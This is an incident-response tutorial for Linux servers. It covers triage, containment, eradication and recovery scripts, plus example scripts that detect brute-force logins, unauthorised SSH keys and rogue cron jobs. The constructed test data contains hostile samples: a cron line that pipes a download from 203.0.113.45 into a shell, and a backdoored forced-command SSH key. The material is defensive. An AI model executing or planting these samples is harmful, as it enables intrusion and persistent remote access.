When a security incident occurs, the speed and effectiveness of your response determine whether it ends as a minor disruption or a catastrophic breach. An Incident Response Plan (IRP) provides structured, rehearsed procedures that let your team detect, contain, eradicate, and recover from security incidents systematically instead of improvising under pressure.
The 6 Phases of Incident Response
- Preparation — Tools, training, and procedures ready before incidents occur
- Detection & Analysis — Identifying and confirming security incidents
- Containment — Limiting the scope and impact of the incident
- Eradication — Removing the threat from all affected systems
- Recovery — Restoring systems and verifying normal operations
- Post-Incident — Lessons learned and process improvements
Phase 1: Preparation
Essential Toolkit
# Incident Response Toolkit - install on all servers ahead of time.
# Package names are Debian/Ubuntu; volatility3 may be packaged under a
# different name or need a pip install on your release. Keep a second copy
# of these tools on trusted, read-only media: binaries on a compromised
# host cannot be trusted during the incident.
sudo apt install -y \
    tcpdump wireshark-common nmap \
    strace ltrace lsof \
    volatility3 sleuthkit \
    chkrootkit rkhunter \
    auditd aide debsums \
    netcat-openbsd socat
# Pre-configure audit rules (the redirect itself needs root, hence tee)
sudo tee /etc/audit/rules.d/incident-response.rules > /dev/null << 'EOF'
## Identity and privilege changes
-w /etc/passwd -p wa -k identity_change
-w /etc/shadow -p wa -k identity_change
-w /etc/sudoers -p wa -k privilege_change
-w /etc/sudoers.d/ -p wa -k privilege_change
## Log tampering
-w /var/log/ -p wa -k log_tampering
## Every command executed and every outbound connection. High volume:
## size the audit log and ship it off-host. Add matching arch=b32 rules
## if 32-bit binaries can run on this host, or they bypass these.
-a always,exit -F arch=b64 -S execve -k command_exec
-a always,exit -F arch=b64 -S connect -k network_connect
## Execution from world-writable directories
-w /tmp -p x -k tmp_exec
-w /dev/shm -p x -k shm_exec
EOF
# Load the rules: augenrules merges everything in rules.d/ and loads it
sudo augenrules --load
sudo auditctl -l   # confirm the rules are active
Phase 2: Detection & Analysis
#!/bin/bash
# triage.sh - First responder triage script.
# Run as root from trusted tooling and send the output off-host
# (e.g. ./triage.sh | ssh responder@forensics 'cat > web1-triage.txt'),
# never onto the suspect disk. Collect volatile data (memory, processes,
# connections) before anything that alters the system.
echo "=== SYSTEM TRIAGE - $(date -u +%Y-%m-%dT%H:%M:%SZ) ==="
echo "=== Hostname: $(hostname) ==="
echo -e "\n--- Active Users ---"
w
last -20
echo -e "\n--- Top Processes by CPU (with parent PID and start time) ---"
ps -eo pid,ppid,user,%cpu,%mem,lstart,cmd --sort=-%cpu | head -20
echo -e "\n--- Processes Whose Binary Was Deleted (typical of in-memory malware) ---"
ls -l /proc/[0-9]*/exe 2>/dev/null | grep '(deleted)'
echo -e "\n--- Network Connections (excluding loopback) ---"
ss -tunapl | grep -v "127.0.0.1\|::1"
echo -e "\n--- Recently Modified Files (last 24h; mtime is trivially forged, so ctime is checked too) ---"
find /etc /usr/bin /usr/sbin -type f \( -mtime -1 -o -ctime -1 \) 2>/dev/null
echo -e "\n--- Scheduled Tasks ---"
for user in $(cut -f1 -d: /etc/passwd); do
    crontab -l -u "$user" 2>/dev/null | grep -v "^#" | sed "s/^/$user: /"
done
cat /etc/crontab
ls -la /etc/cron.d/
systemctl list-timers --all --no-pager
echo -e "\n--- Failed Logins (auth.log on Debian/Ubuntu; use journalctl -u ssh on journald-only hosts) ---"
grep "Failed password" /var/log/auth.log 2>/dev/null | tail -20
echo -e "\n--- Listening Services ---"
ss -tlnp
echo -e "\n--- Rootkit Check ---"
chkrootkit 2>/dev/null | grep -i "infected"
rkhunter --check --skip-keypress --report-warnings-only 2>/dev/null
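The triage output above lists raw failed logins; the analyst still has to decide what they mean. Two indicators worth automating are a single source address producing many failures (a brute-force or spray) and a login that is accepted from an address that was failing moments before (a guessed or reused password). The script below, an added example that is not code from the original page, extracts both from sshd log lines. The log lines are constructed for the example; on a real host pipe in /var/log/auth.log or `journalctl -u ssh --no-pager` instead.

```shell
#!/usr/bin/env bash
# Added example: brute-force sources and success-after-failure logins in sshd logs.
# SAMPLE_AUTH_LOG is constructed test data, not from a real host.
set -u

SAMPLE_AUTH_LOG='Apr 10 03:12:01 web1 sshd[2211]: Failed password for invalid user admin from 203.0.113.45 port 51022 ssh2
Apr 10 03:12:03 web1 sshd[2213]: Failed password for invalid user admin from 203.0.113.45 port 51024 ssh2
Apr 10 03:12:05 web1 sshd[2215]: Failed password for root from 203.0.113.45 port 51026 ssh2
Apr 10 03:12:07 web1 sshd[2217]: Failed password for root from 203.0.113.45 port 51028 ssh2
Apr 10 03:12:09 web1 sshd[2219]: Failed password for deploy from 203.0.113.45 port 51030 ssh2
Apr 10 03:12:11 web1 sshd[2221]: Accepted password for deploy from 203.0.113.45 port 51032 ssh2
Apr 10 08:00:00 web1 sshd[3001]: Accepted publickey for deploy from 198.51.100.7 port 40000 ssh2: ED25519 SHA256:abc
Apr 10 09:15:42 web1 sshd[3100]: Failed password for root from 192.0.2.9 port 60001 ssh2'

# Print "count ip" for every source with at least $2 failed password attempts,
# highest count first.
brute_force_sources() {   # $1 = log text, $2 = threshold
    printf '%s\n' "$1" \
        | awk -v min="$2" '
            /sshd\[[0-9]+\]: Failed password/ {
                for (i = 1; i <= NF; i++) if ($i == "from") { fails[$(i+1)]++; break }
            }
            END { for (ip in fails) if (fails[ip] >= min) print fails[ip], ip }' \
        | sort -rn
}

# Print "ip user" for every Accepted login from an address that already had
# failures earlier in the same log: the footprint of a guessed password.
success_after_failures() {   # $1 = log text
    printf '%s\n' "$1" \
        | awk '
            /sshd\[[0-9]+\]: (Failed|Accepted) (password|publickey)/ {
                for (i = 1; i <= NF; i++) if ($i == "from") { ip = $(i+1); break }
                for (i = 1; i <= NF; i++) if ($i == "for") {
                    user = $(i+1)
                    if (user == "invalid") user = $(i+3)   # "for invalid user NAME"
                    break
                }
                if ($0 ~ /Failed/) fails[ip]++
                else if (fails[ip] > 0) print ip, user
            }'
}

echo "--- sources with >= 3 failed passwords ---"
brute_force_sources "$SAMPLE_AUTH_LOG" 3
echo "--- logins accepted after failures from the same address ---"
success_after_failures "$SAMPLE_AUTH_LOG"
```

On the sample data the first function reports `5 203.0.113.45` and the second reports `203.0.113.45 deploy`; the key-based login from 198.51.100.7 is not flagged because that address never failed. The threshold is deliberately a parameter: on a busy bastion three failures is noise, on an internal database host it is an event.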
Phase 3: Containment
#!/bin/bash
# containment.sh - Isolate compromised system.
# Run as root. Isolation keeps the host powered on (RAM is evidence) but cuts
# it off from everything except the forensics workstation. If your process
# requires a memory image, capture it first: some malware wipes itself when
# it loses its command channel.
FORENSICS_IP="10.0.0.100"        # adjust to your responder workstation
EVIDENCE_DIR="/root/evidence"    # not /tmp, which the attacker may watch or clean; copy off-host afterwards
echo "WARNING: This will isolate the system from the network!"
# Refuse to run if it would cut the responder's own SSH session
# ($SSH_CONNECTION is "client_ip client_port server_ip server_port").
if [ -n "${SSH_CONNECTION:-}" ] && [ "${SSH_CONNECTION%% *}" != "$FORENSICS_IP" ]; then
    echo "Connected from ${SSH_CONNECTION%% *}, not $FORENSICS_IP; reconnect from the forensics host first." >&2
    exit 1
fi
read -p "Continue? (yes/no): " CONFIRM
if [ "$CONFIRM" != "yes" ]; then exit 1; fi
# Save current network state for forensics
mkdir -p "$EVIDENCE_DIR"
{ ip addr show; ip route show; ss -tunapl; } > "$EVIDENCE_DIR/network-state-before.txt"
iptables-save > "$EVIDENCE_DIR/iptables-before.rules"
# Block all network traffic except the forensics workstation. Allow rules go
# in before the policy flips to DROP so the forensics session is never cut.
iptables -F
iptables -A INPUT -i lo -j ACCEPT
iptables -A OUTPUT -o lo -j ACCEPT
iptables -A INPUT -s "$FORENSICS_IP" -j ACCEPT
iptables -A OUTPUT -d "$FORENSICS_IP" -j ACCEPT
iptables -P INPUT DROP
iptables -P OUTPUT DROP
iptables -P FORWARD DROP
# iptables does not touch IPv6; without this the host stays reachable over v6
ip6tables -F
ip6tables -A INPUT -i lo -j ACCEPT
ip6tables -A OUTPUT -o lo -j ACCEPT
ip6tables -P INPUT DROP
ip6tables -P OUTPUT DROP
ip6tables -P FORWARD DROP
echo "System isolated. Only $FORENSICS_IP can connect."
logger "INCIDENT: System isolated by $(whoami) at $(date)"
# Disable accounts that logged in within the last day, except root and the
# responder. passwd -l only blocks password logins; SSH keys keep working, so
# expire the account as well and kill its live sessions. Treat the list as a
# heuristic: the attacker's account may be older than one day.
for user in $(lastlog --time 1 | awk 'NR>1 {print $1}'); do
    if [ "$user" != "root" ] && [ "$user" != "$(whoami)" ]; then
        usermod --lock --expiredate 1970-01-02 "$user"
        pkill -KILL -u "$user"
        echo "Locked and expired account: $user"
    fi
done
Phase 4: Eradication
# Find and remove malicious artifacts.
# Caveat: cleaning a compromised host in place is the weaker option; a rootkit
# or a tampered package database can hide from every check below. When the
# business allows, rebuild from a known-good image and use this phase to
# confirm what the attacker left behind.
INCIDENT_START="2026-04-10"    # earliest suspected compromise; adjust
# Check for web shells. "-newer /var/log/syslog" matches almost nothing because
# syslog changes constantly; compare against the incident date instead.
# Expect false positives: eval/exec/system are common in legitimate PHP.
find / -xdev -name "*.php" -newermt "$INCIDENT_START" \
    -exec grep -l "eval\|base64_decode\|exec\|system\|passthru" {} + 2>/dev/null
# Check for unauthorized SSH keys (compare against the keys you actually issued)
for dir in /home/*/.ssh /root/.ssh; do
    if [ -f "$dir/authorized_keys" ]; then
        echo "=== $dir/authorized_keys ==="
        cat "$dir/authorized_keys"
    fi
done
# Check for persistence mechanisms: services, timers, per-user units, legacy init
systemctl list-unit-files --type=service --state=enabled
systemctl list-timers --all --no-pager
ls -la /etc/systemd/system/*.service /etc/systemd/system/*.timer /home/*/.config/systemd/user/ 2>/dev/null
cat /etc/rc.local 2>/dev/null
find /etc/init.d /etc/cron.d /etc/profile.d -type f -newermt "$INCIDENT_START"
# Cron jobs: preserve, review, then remove only what is malicious.
# Running "crontab -r" for every user destroys legitimate jobs and evidence alike.
mkdir -p /root/evidence/cron
for user in $(cut -f1 -d: /etc/passwd); do
    crontab -l -u "$user" > "/root/evidence/cron/$user" 2>/dev/null || rm -f "/root/evidence/cron/$user"
done
grep -l . /root/evidence/cron/* 2>/dev/null    # users whose crontab needs review
# crontab -r -u <user>    # only after review, per user
# Verify system binary integrity. debsums trusts the dpkg database, which the
# attacker may also have edited; cross-check suspicious files against a clean mirror.
debsums -c 2>/dev/null | head -20
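Listing authorized_keys files and crontabs only helps if something compares them with what should be there. The script below, an added example and not code from the original page, does that comparison: it flags SSH keys that are not on an approved list or that carry options (a `command=` forced command on an otherwise legitimate key is a classic backdoor), and it shows the cron lines that are absent from a known-good baseline, so that removal is targeted instead of wholesale. The approved-key list, the authorized_keys contents and both crontabs are constructed for the example; in practice the baseline comes from configuration management or the last clean backup.

```shell
#!/usr/bin/env bash
# Added example: review SSH keys and cron entries against a baseline instead of
# wiping them. All inputs below are constructed test data.
set -u

# Keys the team actually issued (type + base64 blob; the comment is ignored).
APPROVED_KEYS='ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleApprovedKeyBlob0000000000000000000000001 ops@bastion
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleApprovedKeyBlob0000000000000000000000002 deploy@ci'

# What a compromised host's authorized_keys might look like (constructed).
FOUND_KEYS='ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleApprovedKeyBlob0000000000000000000000001 ops@bastion
# comment line
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQExampleUnknownRsaBlob000000000000000000000000000003 root@kali
command="/bin/sh -c /dev/shm/.x",no-pty ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleApprovedKeyBlob0000000000000000000000002 deploy@ci'

# Print "REASON<TAB>line" for each key that is unapproved or carries options.
# Options precede the key type, so a key that does not start the line is
# reported as OPTIONS even if the key itself is approved.
audit_authorized_keys() {   # $1 = authorized_keys text, $2 = approved keys text
    printf '%s\n' "$1" | awk -v approved="$2" '
        BEGIN {
            n = split(approved, a, "\n")
            for (i = 1; i <= n; i++) if (a[i] != "") { split(a[i], f, " "); ok[f[1] " " f[2]] = 1 }
        }
        /^[ \t]*(#|$)/ { next }
        {
            k = 1
            while (k <= NF && $k !~ /^(ssh-|ecdsa-|sk-)/) k++
            key = $k " " $(k+1)
            if (k > 1)              print "OPTIONS\t" $0
            else if (!(key in ok))  print "UNAPPROVED\t" $0
        }'
}

# Known-good crontab for a user and what the host currently has (constructed).
BASELINE_CRON='0 2 * * * /usr/local/bin/backup.sh
*/5 * * * * /usr/local/bin/healthcheck.sh'
FOUND_CRON='0 2 * * * /usr/local/bin/backup.sh
*/5 * * * * /usr/local/bin/healthcheck.sh
* * * * * curl -s http://203.0.113.45/c | sh'

# Print the non-comment lines present now but absent from the baseline.
unexpected_cron_lines() {   # $1 = current crontab text, $2 = baseline text
    printf '%s\n' "$1" | awk -v base="$2" '
        BEGIN { n = split(base, b, "\n"); for (i = 1; i <= n; i++) seen[b[i]] = 1 }
        !($0 in seen) && $0 !~ /^[ \t]*(#|$)/'
}

echo "--- authorized_keys findings ---"
audit_authorized_keys "$FOUND_KEYS" "$APPROVED_KEYS"
echo "--- cron lines not in baseline ---"
unexpected_cron_lines "$FOUND_CRON" "$BASELINE_CRON"
```

Matching on the full type-plus-blob string rather than the comment is deliberate: the comment is free text and an attacker will happily label a key `deploy@ci`. Save the raw files under the evidence directory before acting on either report.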
Phase 5: Recovery
# Systematic recovery procedure (run from a clean system where possible)
# 1. Restore from a known-good backup: pick the archive taken before the
#    earliest confirmed attacker activity, not simply "two days ago", and
#    verify the repository (borg check) before trusting it.
KNOWN_GOOD_DATE="2026-04-08"    # day before the earliest attacker activity; placeholder for your own naming scheme
borg list /backup/borg-repo
borg extract /backup/borg-repo::last-known-good-$KNOWN_GOOD_DATE
# 2. Reinstall critical packages. On a host you could not rebuild this only
#    helps if apt/dpkg themselves are intact (see the debsums check above).
apt install --reinstall openssh-server nginx postgresql coreutils
# 3. Rotate ALL credentials: set a new root password now, then force every
#    human account (UID >= 1000 with a login shell) to change at next login
passwd root
for user in $(awk -F: '$3 >= 1000 && $7 !~ /nologin|false/ {print $1}' /etc/passwd); do
    passwd --expire "$user"
done
# 4. Regenerate SSH host keys. Clients will see a host-key-changed warning;
#    publish the new fingerprints so users do not learn to ignore it.
rm /etc/ssh/ssh_host_*
dpkg-reconfigure openssh-server
ssh-keygen -lf /etc/ssh/ssh_host_ed25519_key.pub
# 5. Rotate application secrets the attacker could have read: database
#    passwords, API keys, TLS private keys (and reissue their certificates),
#    CI/CD tokens and cloud IAM credentials
# 6. Verify system integrity. aide --check needs a baseline from before the
#    incident; after a rebuild, re-initialize it first (aide --init).
aide --check
rkhunter --check --skip-keypress
# 7. Restore network access gradually: flush the isolation rules and apply the
#    hardened baseline. The script path is a placeholder for your own; it must
#    also reset the chain policies, since -F alone leaves them at DROP.
iptables -F; ip6tables -F
/etc/iptables/apply-hardened-rules.sh
Phase 6: Post-Incident Analysis
# Generate timeline of events. ausearch parses dates in the system locale's
# format (MM/DD/YYYY on en_US); the keywords yesterday, today, recent and
# this-week are also accepted.
mkdir -p /forensics
ausearch --start 04/10/2026 00:00:00 --end 04/11/2026 00:00:00 -i > /forensics/audit-timeline.txt
# Analyze authentication logs. Do not pipe through sort: "Apr" sorts before
# "Mar", so a text sort scrambles chronology across months. The files are
# already chronological; read the rotated file first to keep them that way.
for f in /var/log/auth.log.1 /var/log/auth.log; do
    grep -E "Accepted|Failed|session opened|session closed" "$f" 2>/dev/null
done > /forensics/auth-timeline.txt
# Create incident report template
cat > /forensics/incident-report.md << "EOF"
# Incident Report
## Summary
- **Date Detected:**
- **Date Contained:**
- **Date Resolved:**
- **Severity:** Critical / High / Medium / Low
- **Type:** Ransomware / Data Breach / Unauthorized Access / DDoS
## Timeline
| Time | Event | Action Taken |
|------|-------|-------------|
| | | |
## Root Cause Analysis
## Impact Assessment
## Remediation Actions Taken
## Lessons Learned
## Recommendations
EOF
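The audit and authentication timelines produced above live in two files with two timestamp formats: sshd lines carry no year and sort badly as text, while `ausearch -i` prints a locale date. To reason about an intrusion you want one chronological list. The script below, an added example that is not code from the original page, rewrites both formats to ISO 8601 and merges them. The sample lines are constructed; the year supplied for syslog lines and the en_US MM/DD/YYYY format of the audit lines are assumptions to adjust for your hosts.

```shell
#!/usr/bin/env bash
# Added example: merge sshd (syslog-format) and ausearch -i events into one
# chronological timeline. AUTH_LINES and AUDIT_LINES are constructed test data.
set -u

AUTH_LINES='Apr 10 03:12:09 web1 sshd[2219]: Failed password for deploy from 203.0.113.45 port 51030 ssh2
Apr 10 03:12:11 web1 sshd[2221]: Accepted password for deploy from 203.0.113.45 port 51032 ssh2
Mar 31 23:59:58 web1 sshd[1900]: Accepted publickey for ops from 198.51.100.7 port 40000 ssh2'

# Mimics ausearch -i output on an en_US locale: msg=audit(MM/DD/YYYY HH:MM:SS.mmm:serial)
AUDIT_LINES='type=EXECVE msg=audit(04/10/2026 03:12:14.201:910) : argc=3 a0=curl a1=-s a2=http://203.0.113.45/c
type=EXECVE msg=audit(04/10/2026 03:12:15.007:912) : argc=1 a0=/dev/shm/.x'

# "Mon DD HH:MM:SS host ..." -> "YYYY-MM-DDTHH:MM:SS auth host ...".
# syslog omits the year, so the caller supplies it; a log that crosses
# New Year needs to be split and converted in two passes.
syslog_to_iso() {   # $1 = year to assume; log lines on stdin
    awk -v year="$1" '
        BEGIN {
            split("Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec", m, " ")
            for (i = 1; i <= 12; i++) mon[m[i]] = sprintf("%02d", i)
        }
        {
            day = sprintf("%02d", $2)
            rest = $0
            sub(/^[A-Za-z]+ +[0-9]+ [0-9:]+ /, "", rest)
            print year "-" mon[$1] "-" day "T" $3 " auth " rest
        }'
}

# "msg=audit(MM/DD/YYYY HH:MM:SS.mmm:serial)" -> "YYYY-MM-DDTHH:MM:SS audit <line>"
# (sub-second part dropped; lines without a timestamp are skipped).
ausearch_to_iso() {   # ausearch -i lines on stdin
    awk '{
        i = index($0, "msg=audit(")
        if (i == 0) next
        ts = substr($0, i + 10, 19)          # "MM/DD/YYYY HH:MM:SS"
        split(ts, p, "[/ ]")                 # p[1]=MM p[2]=DD p[3]=YYYY p[4]=HH:MM:SS
        print p[3] "-" p[1] "-" p[2] "T" p[4] " audit " $0
    }'
}

# Merge both sources and order by the ISO stamp in field 1.
build_timeline() {   # $1 = year for syslog lines, $2 = auth text, $3 = audit text
    {
        printf '%s\n' "$2" | syslog_to_iso "$1"
        printf '%s\n' "$3" | ausearch_to_iso
    } | sort -k1,1
}

build_timeline 2026 "$AUTH_LINES" "$AUDIT_LINES"
```

On the sample data the merged output starts with the March 31 login and ends with the two audit EXECVE records, showing the curl-to-shell download three seconds after the password for `deploy` was accepted; a plain `sort` of the raw lines would have put the April entries before the March one. Feed the real files with `syslog_to_iso 2026 < /forensics/auth-timeline.txt` and `ausearch_to_iso < /forensics/audit-timeline.txt`.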